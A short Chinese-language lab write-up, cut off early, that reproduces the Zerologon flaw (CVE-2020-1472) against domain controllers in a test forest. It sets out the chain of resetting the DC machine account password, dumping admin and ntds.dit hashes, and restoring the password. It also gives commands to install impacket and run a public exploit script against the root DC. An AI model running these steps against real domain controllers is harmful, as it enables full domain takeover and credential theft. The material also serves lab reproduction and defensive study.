林级域环境下复现CVE-2020-1472
环境
域林环境
根DC:10.100.100.100(server2019)
一级林DC:10.100.100.101(server2016)
二级林DC:10.100.100.102(server2012R2)
跳板机(攻击机):10.100.100.105(WIN10)
简要拓扑
过程
利用过程:将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码
攻击首先安装impacket:
git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install
然后下载利用脚本
git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472
直接拿根域测,执行
python cve-2020-1472-exploit.py AD 10.100.100.100
此时 ...